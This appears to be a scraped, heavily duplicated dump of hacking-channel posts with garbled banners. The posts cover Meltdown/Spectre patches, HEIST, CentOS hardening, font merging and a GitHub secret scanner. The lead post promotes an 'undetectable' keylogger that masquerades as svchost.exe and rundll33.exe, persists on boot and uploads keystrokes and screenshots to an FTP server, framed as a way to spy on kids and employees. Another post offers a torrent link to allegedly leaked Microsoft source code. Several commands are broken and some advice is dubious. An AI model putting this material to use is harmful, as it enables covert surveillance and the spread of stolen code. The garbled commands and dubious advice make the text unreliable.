β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦UNDETECTABLE KEYLOGGER VIA IMAGE 2020 UPDATE since 2 years :
Keylogger is 100% invisible keylogger not only for users, but also undetectable by antivirus software. Keylogger Monitors all keystokes, Mouse clicks. It has a seperate process which continues capture system screenshot and send to ftp server in given time.
F E A T U R E S :
1) Discrete/Tamper Proof :By design, Advance Keylogger is undetectable ad thus cannot be tampered with or removed by kids/employees (who are often tech savvy). It does not appear in the Registry, the Process List, the System Tray, the Task Manager, on the Desktop, or in the Add/Remove programs.
2) Keystrokes Typed: See every keystroke typed even if it is deleted. This keystroke logger feature provides a reader-friendly version of all keystrokes logged along with the raw keylogging activity so you can see every detail.
3) Continuous Screenshots: Video-style playback of screenshots for programs and websites selected by you. For example, watch an email as it's being typed and edited instead of just seeing the finished product (1,000 screenshots included with purchase).
4) FTP Server: Screenshot and keylogger Logfile which contain senstive user information send to ftp server (Mobile/Web/System). Powerful ftp server also write in Core Visual C++.
5) AutoStart : Keylogger has functionaility to auto execute on system bootup. It Insert entry on system startup program when it is running.
6) AutoCopy : Keylogger has functionaility to auto copy in %appdata%/roaming/wpdnse/ folder.
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1) download https://github.com/ajayrandhawa/Keylogger
2) Now you have two main files:
Keylogger.Zip Contain two Executable Files. (Sourcecode File Also Included)
a) svchost.exe (Main Keylogger Processs)
b) rundll33.exe (Capture Screenshot & send all Log and Screenshot to FTP Server (ftp://192.168.8.2:2121))
3) Execute both files once time next time its automatically start and capture screenshot and keylog.
4) These names Given for unrecognisable in Task Manager.
π§ββοΈHow to Use ?
5) Start FTP Server on This Ip Address 192.168.8.2:2121
and Start both program and Enjoy
- USE FOR LEARN ONLY !!!
»» IF YOU A SUPER BEGINER, CHECK MORE INFO https://github.com/ajayrandhawa/Keylogger««
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦UNDETECTABLE KEYLOGGER VIA IMAGE 2020 UPDATE since 2 years :
Keylogger is 100% invisible keylogger not only for users, but also undetectable by antivirus software. Keylogger Monitors all keystokes, Mouse clicks. It has a seperate process which continues capture system screenshot and send to ftp server in given time.
F E A T U R E S :
1) Discrete/Tamper Proof :By design, Advance Keylogger is undetectable ad thus cannot be tampered with or removed by kids/employees (who are often tech savvy). It does not appear in the Registry, the Process List, the System Tray, the Task Manager, on the Desktop, or in the Add/Remove programs.
2) Keystrokes Typed: See every keystroke typed even if it is deleted. This keystroke logger feature provides a reader-friendly version of all keystrokes logged along with the raw keylogging activity so you can see every detail.
3) Continuous Screenshots: Video-style playback of screenshots for programs and websites selected by you. For example, watch an email as it's being typed and edited instead of just seeing the finished product (1,000 screenshots included with purchase).
4) FTP Server: Screenshot and keylogger Logfile which contain senstive user information send to ftp server (Mobile/Web/System). Powerful ftp server also write in Core Visual C++.
5) AutoStart : Keylogger has functionaility to auto execute on system bootup. It Insert entry on system startup program when it is running.
6) AutoCopy : Keylogger has functionaility to auto copy in %appdata%/roaming/wpdnse/ folder.
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1) download https://github.com/ajayrandhawa/Keylogger
2) Now you have two main files:
Keylogger.Zip Contain two Executable Files. (Sourcecode File Also Included)
a) svchost.exe (Main Keylogger Processs)
b) rundll33.exe (Capture Screenshot & send all Log and Screenshot to FTP Server (ftp://192.168.8.2:2121))
3) Execute both files once time next time its automatically start and capture screenshot and keylog.
4) These names Given for unrecognisable in Task Manager.
π§ββοΈHow to Use ?
5) Start FTP Server on This Ip Address 192.168.8.2:2121
and Start both program and Enjoy
- USE FOR LEARN ONLY !!!
»» IF YOU A SUPER BEGINER, CHECK MORE INFO https://github.com/ajayrandhawa/Keylogger««
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
GitHub
GitHub - ajayrandhawa/Keylogger: Keylogger is 100% invisible keylogger not only for users, but also undetectable by antivirus software.β¦
Keylogger is 100% invisible keylogger not only for users, but also undetectable by antivirus software. keylogger Monitors all keystokes, Mouse clicks. It has a seperate process which continues capt...
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦https encryption is also cracked HEIST attack to obtain plaintext from encrypted data :
#fastTips
we know the difference between http and https. For encrypted https, we always think it is relatively safe, but today we are going to talk about a web attack that bypasses HTTPS encryption to obtain plaintext information. I donβt know this. The news is happy or sad for you
1) The conditions for the use of the HEIST attack are very simple, requiring only a few lines of simple javascript code, and no man-in-the-middle attack is required. First, the transmitted sensitive data will be captured and saved. This attack method can obtain private sensitive information such as bank card number, real name, phone number, and social security number.
2) But as we all know, most of these data are encrypted by HTTPS. Then make a probe on the size and length of the encrypted data. Many websites use file compression technology to increase the loading speed of web pages, and attackers can just use the design flaws to decrypt the data payload (similar to BREACH attacks and CRIME attacks).
3) HEIST technology can use new APIs (Resource Timing and Fetch) to calculate the number of transmission frames and windows sent by the target host. Throughout the process, researchers can use a piece of JavaScript code to determine the actual size of the HTTPS response message. Then, the malicious HEIST code can cooperate with the BREACH technology to extract the encrypted information from the user's request data.
4) security researchers will demonstrate how to use malicious advertisements on the New York Times official website to accurately measure the size of the encrypted response information. Throughout the process, security researchers will use a virtual third-party website (targetwebsite.com) to send encrypted information. In addition, they will also demonstrate how to infer data information from security tokens used to prevent cross-site request forgery attacks.
5) Although some websites currently deploy basic security measures, most of them cannot prevent HEIST attacks, so this type of attack may become more frequent in recent years. The current prevention methods for HEIST attacks are to either disable third-party cookies or javascript scripts. But third-party cookies and javascript are the basic requirements for ordinary users to access the web, so the two researchers also hope to find and develop a reasonable and effective solution together through the Black Hat conference.
#FastTips
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦https encryption is also cracked HEIST attack to obtain plaintext from encrypted data :
#fastTips
we know the difference between http and https. For encrypted https, we always think it is relatively safe, but today we are going to talk about a web attack that bypasses HTTPS encryption to obtain plaintext information. I donβt know this. The news is happy or sad for you
1) The conditions for the use of the HEIST attack are very simple, requiring only a few lines of simple javascript code, and no man-in-the-middle attack is required. First, the transmitted sensitive data will be captured and saved. This attack method can obtain private sensitive information such as bank card number, real name, phone number, and social security number.
2) But as we all know, most of these data are encrypted by HTTPS. Then make a probe on the size and length of the encrypted data. Many websites use file compression technology to increase the loading speed of web pages, and attackers can just use the design flaws to decrypt the data payload (similar to BREACH attacks and CRIME attacks).
3) HEIST technology can use new APIs (Resource Timing and Fetch) to calculate the number of transmission frames and windows sent by the target host. Throughout the process, researchers can use a piece of JavaScript code to determine the actual size of the HTTPS response message. Then, the malicious HEIST code can cooperate with the BREACH technology to extract the encrypted information from the user's request data.
4) security researchers will demonstrate how to use malicious advertisements on the New York Times official website to accurately measure the size of the encrypted response information. Throughout the process, security researchers will use a virtual third-party website (targetwebsite.com) to send encrypted information. In addition, they will also demonstrate how to infer data information from security tokens used to prevent cross-site request forgery attacks.
5) Although some websites currently deploy basic security measures, most of them cannot prevent HEIST attacks, so this type of attack may become more frequent in recent years. The current prevention methods for HEIST attacks are to either disable third-party cookies or javascript scripts. But third-party cookies and javascript are the basic requirements for ordinary users to access the web, so the two researchers also hope to find and develop a reasonable and effective solution together through the Black Hat conference.
#FastTips
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
DOWNLOAD THE REAL LEAKED SOURCE CODE FROM MICROSOFT :
(TORRENT LINK)
magnet:?xt=urn:btih:3d8b16242b56a3aafb8da7b5fc83ef993ebcf35b&dn=Microsoft%20leaked%20source%20code%20archive_2020-09-24&tr=udp%3a%2f%2ftracker.coppersurfer.tk%3a6969%2fannounce&tr=udp%3a%2f%2f9.rarbg.me%3a2850%2fannounce&tr=udp%3a%2f%2f9.rarbg.to%3a2920%2fannounce&tr=udp%3a%2f%2ftracker.opentrackr.org%3a1337&tr=udp%3a%2f%2ftracker.leechers-paradise.org%3a6969%2fannounce
(TORRENT LINK)
magnet:?xt=urn:btih:3d8b16242b56a3aafb8da7b5fc83ef993ebcf35b&dn=Microsoft%20leaked%20source%20code%20archive_2020-09-24&tr=udp%3a%2f%2ftracker.coppersurfer.tk%3a6969%2fannounce&tr=udp%3a%2f%2f9.rarbg.me%3a2850%2fannounce&tr=udp%3a%2f%2f9.rarbg.to%3a2920%2fannounce&tr=udp%3a%2f%2ftracker.opentrackr.org%3a1337&tr=udp%3a%2f%2ftracker.leechers-paradise.org%3a6969%2fannounce
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦the recent vulnerabilities in the architecture of Intel, AMD and ARM processors:
1) How fortunate that critical vulnerabilities in the architecture of Intel, AMD and ARM processors were published while we were resting.
2) We did not have time to change the equipment, as recommended by US-CERT, as it turned out that it was enough to update the operating systems.
3) Well, the manufacturers had time to release updates.
So, what is the bottom line at the moment.
4) There are two vulnerabilities - Meltdown ("Crash") and Specter ("Ghost").
5) Meltdown allows you to break the barrier between applications and the internal memory of the operating system, which opens access to data stored in the memory of the OS.
Detailed description https://meltdownattack.com/meltdown.pdf.
6) Well, there are also exploits, for example: https://github.com/paboldin/meltdown-exploit.
7) Specter breaks memory isolation between applications themselves: conventionally, one service can crawl into the memory of another.
Description https://spectreattack.com/spectre.pdf. They say exploiting the vulnerability is more difficult, but there are still exploits: https://github.com/crozone/SpectrePoC, https://github.com/Eugnis/spectre-attack.
In general, a nightmare! Update, definitely!
8) Fears about 30% loss of productivity in practice are not justified
π¦Microsoft:
Windows Server 2008 R2 Service Pack 1, Windows 7 Service Pack 1 - KB4056897 or KB4056894
Windows Server 2012 Standard - KB4056899 or KB4056896
Windows 8.1, Windows Server 2012 R2 Standard - KB4056898 or KB4056895
Windows 10 Enterprise - KB4056893
Windows 10 Version 1607, Windows Server 2016 , Windows 10 Mobile - KB4056890
Windows 10 Version 1703 - KB4056891
Windows 10 version 1709 - KB4056892
There may be problems installing the patch due to the antivirus.
Provided a list of antiviruses that block the patch: BitDefender, Carbon Black, Cisco, CrowdStrike, Cylance, Cyren, Endgame, Fortinet, G-DATA, McAfee, Nyotron, Palo-Alto, SentinelOne, Sophos, Trend Micro, VIPRE, Webroot.
9) Modifying or creating the following registry key may help resolve the issue:
?
Key="HKEY_LOCAL_MACHINE"Subkey="SOFTWARE\Microsoft\Windows\CurrentVersion\QualityCompat"
Value Name="cadca5fe-87d3-4b96-b7fb-a231484277cc"
Type="REG_DWORD"
Data="0x00000000"
Very short on performance: tests with the Windows 10 update showed a decrease in various performance parameters by 1-2%.
Details: http://www.guru3d.com/articles-pages/windows-vulnerability-cpu-meltdown-patch-benchmarked.html.
π¦Linux:
Everything is simple, you need a kernel 4.14.12, 4.9.75 or 4.4.110. There are no updates for other branches, but they have a bunch of other unpatched vulnerabilities, so they are not recommended for use.
π¦Apple:
Meltdown has been fixed in iOS 11.2, macOS 10.13.2, and tvOS 11.2. No update is required for watchOS.
Specter, Apple claims, is only practically exploitable via JavaScript in a web browser, so they will keep Safari updated. This patch, as well as the Axis Specter patches, are pending.
π¦Google:
Android with the patch from 2018-01-05 is protected.
Chrome 64 adds Specter protection, but is set to release on January 23rd. For now, if you wish, you can enable Site Isolation to protect against attacks.
π¦Firefox:
Mozilla has provided a browser-based patch to prevent Specter from being used in version 57 of Firefox.
π¦Cisco:
Just doing analysis and getting ready to release patches.
Status here: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180104-cpusidechannel
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦the recent vulnerabilities in the architecture of Intel, AMD and ARM processors:
1) How fortunate that critical vulnerabilities in the architecture of Intel, AMD and ARM processors were published while we were resting.
2) We did not have time to change the equipment, as recommended by US-CERT, as it turned out that it was enough to update the operating systems.
3) Well, the manufacturers had time to release updates.
So, what is the bottom line at the moment.
4) There are two vulnerabilities - Meltdown ("Crash") and Specter ("Ghost").
5) Meltdown allows you to break the barrier between applications and the internal memory of the operating system, which opens access to data stored in the memory of the OS.
Detailed description https://meltdownattack.com/meltdown.pdf.
6) Well, there are also exploits, for example: https://github.com/paboldin/meltdown-exploit.
7) Specter breaks memory isolation between applications themselves: conventionally, one service can crawl into the memory of another.
Description https://spectreattack.com/spectre.pdf. They say exploiting the vulnerability is more difficult, but there are still exploits: https://github.com/crozone/SpectrePoC, https://github.com/Eugnis/spectre-attack.
In general, a nightmare! Update, definitely!
8) Fears about 30% loss of productivity in practice are not justified
π¦Microsoft:
Windows Server 2008 R2 Service Pack 1, Windows 7 Service Pack 1 - KB4056897 or KB4056894
Windows Server 2012 Standard - KB4056899 or KB4056896
Windows 8.1, Windows Server 2012 R2 Standard - KB4056898 or KB4056895
Windows 10 Enterprise - KB4056893
Windows 10 Version 1607, Windows Server 2016 , Windows 10 Mobile - KB4056890
Windows 10 Version 1703 - KB4056891
Windows 10 version 1709 - KB4056892
There may be problems installing the patch due to the antivirus.
Provided a list of antiviruses that block the patch: BitDefender, Carbon Black, Cisco, CrowdStrike, Cylance, Cyren, Endgame, Fortinet, G-DATA, McAfee, Nyotron, Palo-Alto, SentinelOne, Sophos, Trend Micro, VIPRE, Webroot.
9) Modifying or creating the following registry key may help resolve the issue:
?
Key="HKEY_LOCAL_MACHINE"Subkey="SOFTWARE\Microsoft\Windows\CurrentVersion\QualityCompat"
Value Name="cadca5fe-87d3-4b96-b7fb-a231484277cc"
Type="REG_DWORD"
Data="0x00000000"
Very short on performance: tests with the Windows 10 update showed a decrease in various performance parameters by 1-2%.
Details: http://www.guru3d.com/articles-pages/windows-vulnerability-cpu-meltdown-patch-benchmarked.html.
π¦Linux:
Everything is simple, you need a kernel 4.14.12, 4.9.75 or 4.4.110. There are no updates for other branches, but they have a bunch of other unpatched vulnerabilities, so they are not recommended for use.
π¦Apple:
Meltdown has been fixed in iOS 11.2, macOS 10.13.2, and tvOS 11.2. No update is required for watchOS.
Specter, Apple claims, is only practically exploitable via JavaScript in a web browser, so they will keep Safari updated. This patch, as well as the Axis Specter patches, are pending.
π¦Google:
Android with the patch from 2018-01-05 is protected.
Chrome 64 adds Specter protection, but is set to release on January 23rd. For now, if you wish, you can enable Site Isolation to protect against attacks.
π¦Firefox:
Mozilla has provided a browser-based patch to prevent Specter from being used in version 57 of Firefox.
π¦Cisco:
Just doing analysis and getting ready to release patches.
Status here: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180104-cpusidechannel
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
Build your first Microservices application using Go and gRPC (Golang)
https://mega.nz/#F!04RDjIoS!AA4LPg9G3uK1zUXRN5K1VQ
https://mega.nz/#F!04RDjIoS!AA4LPg9G3uK1zUXRN5K1VQ
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦What is DataOps ?
The demand for information products and access to information resources is growing exponentially.
Today's data management platforms and data platform teams cannot meet the demand for DevOps-enabled products.
DataOps is a practice in which analysts, data scientists, developers, and administrators participate together throughout the entire service lifecycle from design to development and production support.
The goal of DataOps in the enterprise is to truly increase the speed of analysis and generate analytic results for data consumers.
As with DevOps, automation is a key tenet in DataOps, but in the past, data has not been used much for extreme automation.
So using DataOps will help you compete in analytics that will drive competition in the coming years.
DataOps professional responsibilities:
1) Providing access to multiple data sources
2) Facilitate testing and monitoring of data management processes
3) Data model creation and data versioning
4) Data quality, security, privacy, storage management
5) Data infrastructure management and deployment
6) Setting standards, processes and methodology for a data analytics product
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦What is DataOps ?
The demand for information products and access to information resources is growing exponentially.
Today's data management platforms and data platform teams cannot meet the demand for DevOps-enabled products.
DataOps is a practice in which analysts, data scientists, developers, and administrators participate together throughout the entire service lifecycle from design to development and production support.
The goal of DataOps in the enterprise is to truly increase the speed of analysis and generate analytic results for data consumers.
As with DevOps, automation is a key tenet in DataOps, but in the past, data has not been used much for extreme automation.
So using DataOps will help you compete in analytics that will drive competition in the coming years.
DataOps professional responsibilities:
1) Providing access to multiple data sources
2) Facilitate testing and monitoring of data management processes
3) Data model creation and data versioning
4) Data quality, security, privacy, storage management
5) Data infrastructure management and deployment
6) Setting standards, processes and methodology for a data analytics product
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦New Update DumpTheGit searches through public repositories to find sensitive information uploaded to the Github repositories.
The tool will flag the matches for potentially sensitive files like credentials, secret keys, tokens etc which have been accidentally uploaded by the developers. DumpTheGit just require your Github Access Token to fetch the information.
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1)download or clone https://github.com/Securityautomation/DumpTheGit
2) Move the repository's file in your webserver(example: Tomcat, XAMPP,
3) LAMP, default(MAC apache) etc.)
4) Open the index.html to access the tool.
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦New Update DumpTheGit searches through public repositories to find sensitive information uploaded to the Github repositories.
The tool will flag the matches for potentially sensitive files like credentials, secret keys, tokens etc which have been accidentally uploaded by the developers. DumpTheGit just require your Github Access Token to fetch the information.
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1)download or clone https://github.com/Securityautomation/DumpTheGit
2) Move the repository's file in your webserver(example: Tomcat, XAMPP,
3) LAMP, default(MAC apache) etc.)
4) Open the index.html to access the tool.
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
GitHub
GitHub - Securityautomation/DumpTheGit: DumpTheGit searches through public repositories to find sensitive information uploadedβ¦
DumpTheGit searches through public repositories to find sensitive information uploaded to the Github repositories. - GitHub - Securityautomation/DumpTheGit: DumpTheGit searches through public repos...
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦π§CentOS Server Security Tips :
1) Disable unnecessary commands SUID and SGID
If the setuid and setgid bits are set in binaries, these commands can run tasks with other user or group privileges, such as root privilege, which can lead to serious security problems.
2) Often, buffer overflow attacks can exploit these executables to run unauthorized code as root.
# find / -path / proc -prune -o -type f \ (-perm -4000 -o -perm -2000 \) -exec ls -l {} \;
3) To clear the setuid bit, run the following command:
# chmod us / path / to / binary_file
4) To clear the setgid bit, run the following command:
# chmod gs / path / to / binary_file
5) Check for unknown files and directories
Files or directories not owned by an existing account must be removed or user and group rights assigned.
6) Run the below find command to list files or directories without users and groups.
# find / -nouser -o -nogroup -exec ls -l {} \;
7) List of files available for recording
Keeping a writable file on the system can be dangerous because anyone can change it.
8) Run the command below to display writable files other than symbolic links which are always writable to everyone.
# find / -path / proc -prune -o -perm -2! -type l βls
9) Create strong passwords
Create a password that is at least eight characters long.
Password must contain numbers, special characters and capital letters.
Use pwmake to generate a 128-bit password from / dev / urandom.
# pwmake 128
10) Implement a strong password policy
Force the system to use strong passwords by adding the following line to the /etc/pam.d/passwd file:
password required pam_pwquality.so retry = 3
By adding this line, you enter a policy where the entered password cannot contain more than 3 characters in a monotone sequence, for example abcd, and more than 3 identical consecutive characters, for example 1111.
11) To force users to use a password that is at least 8 characters long, including all character classes, sequential character checking, add the following lines to the /etc/security/pwquality.conf file:
minlen = 8
minclass = 4
maxsequence = 3
maxrepeat = 3
How to Apply Strong User Password Policy in Ubuntu / Debian
Use password aging
The chage command can be used to control the age of a user's password.
To set the age of a user's password to 45 days, use the following command:
# chage -M 45 username
To disable password expiration use the command:
# chage -M -1 username
Force password expiration (user must change password at next login):
# chage -d 0 username
12) Blocking accounts
User accounts can be locked out by running passwd or usermod command:
# passwd -l username
# usermod -L username
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦π§CentOS Server Security Tips :
1) Disable unnecessary commands SUID and SGID
If the setuid and setgid bits are set in binaries, these commands can run tasks with other user or group privileges, such as root privilege, which can lead to serious security problems.
2) Often, buffer overflow attacks can exploit these executables to run unauthorized code as root.
# find / -path / proc -prune -o -type f \ (-perm -4000 -o -perm -2000 \) -exec ls -l {} \;
3) To clear the setuid bit, run the following command:
# chmod us / path / to / binary_file
4) To clear the setgid bit, run the following command:
# chmod gs / path / to / binary_file
5) Check for unknown files and directories
Files or directories not owned by an existing account must be removed or user and group rights assigned.
6) Run the below find command to list files or directories without users and groups.
# find / -nouser -o -nogroup -exec ls -l {} \;
7) List of files available for recording
Keeping a writable file on the system can be dangerous because anyone can change it.
8) Run the command below to display writable files other than symbolic links which are always writable to everyone.
# find / -path / proc -prune -o -perm -2! -type l βls
9) Create strong passwords
Create a password that is at least eight characters long.
Password must contain numbers, special characters and capital letters.
Use pwmake to generate a 128-bit password from / dev / urandom.
# pwmake 128
10) Implement a strong password policy
Force the system to use strong passwords by adding the following line to the /etc/pam.d/passwd file:
password required pam_pwquality.so retry = 3
By adding this line, you enter a policy where the entered password cannot contain more than 3 characters in a monotone sequence, for example abcd, and more than 3 identical consecutive characters, for example 1111.
11) To force users to use a password that is at least 8 characters long, including all character classes, sequential character checking, add the following lines to the /etc/security/pwquality.conf file:
minlen = 8
minclass = 4
maxsequence = 3
maxrepeat = 3
How to Apply Strong User Password Policy in Ubuntu / Debian
Use password aging
The chage command can be used to control the age of a user's password.
To set the age of a user's password to 45 days, use the following command:
# chage -M 45 username
To disable password expiration use the command:
# chage -M -1 username
Force password expiration (user must change password at next login):
# chage -d 0 username
12) Blocking accounts
User accounts can be locked out by running passwd or usermod command:
# passwd -l username
# usermod -L username
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Merge Fonts Using a FontForge in LINUX
1) Create a new file named βmergefonts.shβ and paste the following code in it:
#!/usr/bin/fontforge
Open($1)
SelectAll()
ScaleToEm(1024)
Generate("1.ttf")
Close()
Open($2)
SelectAll()
ScaleToEm(1024)
Generate("2.ttf")
Close()
Open("1.ttf")
MergeFonts("2.ttf")
Generate("my_custom_font.ttf")
Close()
2) The code is pretty straight forward. The β$1β argument is for your primary font while the β$2β argument is for your secondary font. Fonts are first scaled to a uniform size and then merged to generate a new font. If you do not scale them to a common size, you may get uneven text rendering from the final merged font.
3) To check the size of a font in βemβ units, run the command below (replace βfont.ttfβ with name of your own font file):
$ fontforge -lang=ff -c 'Open($1); Print($em); Close()' font.ttf
You will get some output like this:
4) The glyph named f_i is mapped to U+F001.
But its name indicates it should be mapped to U+FB01.
2048
5) Change βScaleToEm(1024)β lines in the script above with your desired value. You can also edit the script and put an extra β$3β argument to specify the size value from the command line.
6) Now to merge the two fonts, specify fonts as arguments while running βmergefonts.shβ script. The order of these arguments is important as the font specified as the second argument ($2) will be merged into the font specified as first argument ($1). The first argument should be of your main font that you intend to use in your project. Put the βmergefonts.shβ script and two fonts in a folder, launch a new terminal window from the folder and run the following command to merge the fonts:
$ ./mergefonts.sh font1.ttf font2.ttf
7) After running the script, you will find the new merged font as βmy_custom_font.ttfβ in the working directory. You may see some warnings and errors in the terminal after running the command above. These errors wonβt stop the merging process of the fonts. If they are simple warnings, you can ignore them. However, if there are conflicts and errors during the merging process, you may need to review them and fix them individually by manually modifying the glyphs in FontForge GUI app. It totally depends on the kind of fonts you choose for merging and you may not get any errors at all.
8) Note that the very first line in the script is the location of the FontForge binary as shebang. This allows you to directly run the script in the terminal without having to manually specify the FontForge command in the terminal. To check the location of FontForge binary in your system, run the command below:
$ which fontforge
Alternatively, you can run any FontForge script using the β-scriptβ argument.
$ fontforge -script mergefonts.sh font1.ttf font2.ttf
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Merge Fonts Using a FontForge in LINUX
1) Create a new file named βmergefonts.shβ and paste the following code in it:
#!/usr/bin/fontforge
Open($1)
SelectAll()
ScaleToEm(1024)
Generate("1.ttf")
Close()
Open($2)
SelectAll()
ScaleToEm(1024)
Generate("2.ttf")
Close()
Open("1.ttf")
MergeFonts("2.ttf")
Generate("my_custom_font.ttf")
Close()
2) The code is pretty straight forward. The β$1β argument is for your primary font while the β$2β argument is for your secondary font. Fonts are first scaled to a uniform size and then merged to generate a new font. If you do not scale them to a common size, you may get uneven text rendering from the final merged font.
3) To check the size of a font in βemβ units, run the command below (replace βfont.ttfβ with name of your own font file):
$ fontforge -lang=ff -c 'Open($1); Print($em); Close()' font.ttf
You will get some output like this:
4) The glyph named f_i is mapped to U+F001.
But its name indicates it should be mapped to U+FB01.
2048
5) Change βScaleToEm(1024)β lines in the script above with your desired value. You can also edit the script and put an extra β$3β argument to specify the size value from the command line.
6) Now to merge the two fonts, specify fonts as arguments while running βmergefonts.shβ script. The order of these arguments is important as the font specified as the second argument ($2) will be merged into the font specified as first argument ($1). The first argument should be of your main font that you intend to use in your project. Put the βmergefonts.shβ script and two fonts in a folder, launch a new terminal window from the folder and run the following command to merge the fonts:
$ ./mergefonts.sh font1.ttf font2.ttf
7) After running the script, you will find the new merged font as βmy_custom_font.ttfβ in the working directory. You may see some warnings and errors in the terminal after running the command above. These errors wonβt stop the merging process of the fonts. If they are simple warnings, you can ignore them. However, if there are conflicts and errors during the merging process, you may need to review them and fix them individually by manually modifying the glyphs in FontForge GUI app. It totally depends on the kind of fonts you choose for merging and you may not get any errors at all.
8) Note that the very first line in the script is the location of the FontForge binary as shebang. This allows you to directly run the script in the terminal without having to manually specify the FontForge command in the terminal. To check the location of FontForge binary in your system, run the command below:
$ which fontforge
Alternatively, you can run any FontForge script using the β-scriptβ argument.
$ fontforge -script mergefonts.sh font1.ttf font2.ttf
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦
1) Make sure your application is free of vulnerabilities.
The most dangerous threat to an application is its own vulnerabilities and flaws.
Make sure there are no known vulnerabilities in your application.
It can be as a web application, mobile application, or desktop application, and the vulnerability remediation will help prevent threats.
2) Consider testing the security of your application before shipping it to production.
To eliminate the vulnerability, you can conduct security testing of your applications.
Security testing doesn't slow down the development process.
Security testing helps you find and fix vulnerabilities in your application, as well as make your applications more efficient.
Therefore, consider checking the security of your applications before going into production.
3) Bug Bounty program
Many large companies such as Mozilla, Facebook, Yahoo!, Google, Reddit, Square, and Microsoft are organizing Bug Bounty programs to identify vulnerabilities in their applications.
This program allows your organization to find and fix bugs before they become known to the public or known hackers.
This way you can prevent incidents.
4) Train your organization on application security best practices.
You can also protect your apps by educating your employees about their security.
Knowledge of cybersecurity can help your organization counter the threats of your applications.
5) Use an automatic scanner to keep the application secure.
Scanning your entire application is also a good security measure.
Consider using an automated scanner to scan that will run tests daily.
You can also use vulnerability scanning tools that are automated.
Vulnerability scanning tools will search your applications for vulnerabilities such as cross-site scripting, SQL injection, command injection, path traversal, etc.
6) Think Before Using Open Source In Your Application
open source can be vulnerable.
Thus, using open source code in your application can leave your applications vulnerable to cyber attacks.
So think twice before using open source in your application.
7) Consider encrypting your application source code.
Source code encryption ensures that an attacker cannot gain access to the source code of your applications.
8) Penetration testing also helps protect your applications
Penetration testing is also a pentest.
Penetration testing is useful for protecting cybercriminal applications.
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦
1) Make sure your application is free of vulnerabilities.
The most dangerous threat to an application is its own vulnerabilities and flaws.
Make sure there are no known vulnerabilities in your application.
It can be as a web application, mobile application, or desktop application, and the vulnerability remediation will help prevent threats.
2) Consider testing the security of your application before shipping it to production.
To eliminate the vulnerability, you can conduct security testing of your applications.
Security testing doesn't slow down the development process.
Security testing helps you find and fix vulnerabilities in your application, as well as make your applications more efficient.
Therefore, consider checking the security of your applications before going into production.
3) Bug Bounty program
Many large companies such as Mozilla, Facebook, Yahoo!, Google, Reddit, Square, and Microsoft are organizing Bug Bounty programs to identify vulnerabilities in their applications.
This program allows your organization to find and fix bugs before they become known to the public or known hackers.
This way you can prevent incidents.
4) Train your organization on application security best practices.
You can also protect your apps by educating your employees about their security.
Knowledge of cybersecurity can help your organization counter the threats of your applications.
5) Use an automatic scanner to keep the application secure.
Scanning your entire application is also a good security measure.
Consider using an automated scanner to scan that will run tests daily.
You can also use vulnerability scanning tools that are automated.
Vulnerability scanning tools will search your applications for vulnerabilities such as cross-site scripting, SQL injection, command injection, path traversal, etc.
6) Think Before Using Open Source In Your Application
open source can be vulnerable.
Thus, using open source code in your application can leave your applications vulnerable to cyber attacks.
So think twice before using open source in your application.
7) Consider encrypting your application source code.
Source code encryption ensures that an attacker cannot gain access to the source code of your applications.
8) Penetration testing also helps protect your applications
Penetration testing is also a pentest.
Penetration testing is useful for protecting cybercriminal applications.
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦What is UChecker ?
1) UChecker, short for Userspace Checker, is a free open source scanner that detects which of your processes are still using outdated libraries and need to be restarted.
The tool was created by KernelCare during live patching development for shared libraries.
With Uchecker, you can identify vulnerable FOSS libraries and fix them.
2) You will have to reboot the affected processes (unless you are using the library update services without rebooting), but by scanning for vulnerabilities, you can determine which processes need attention and which do not.
3) As a result, you avoid unnecessary server reboots that lead to degraded service and / or crashes, as well as creating access vulnerabilities, since libraries are left unpatched until a reboot is scheduled.
4) In fact, you may not even know which services are using which libraries, so it is tempting to just reboot the server to update everything, or restart the core services.
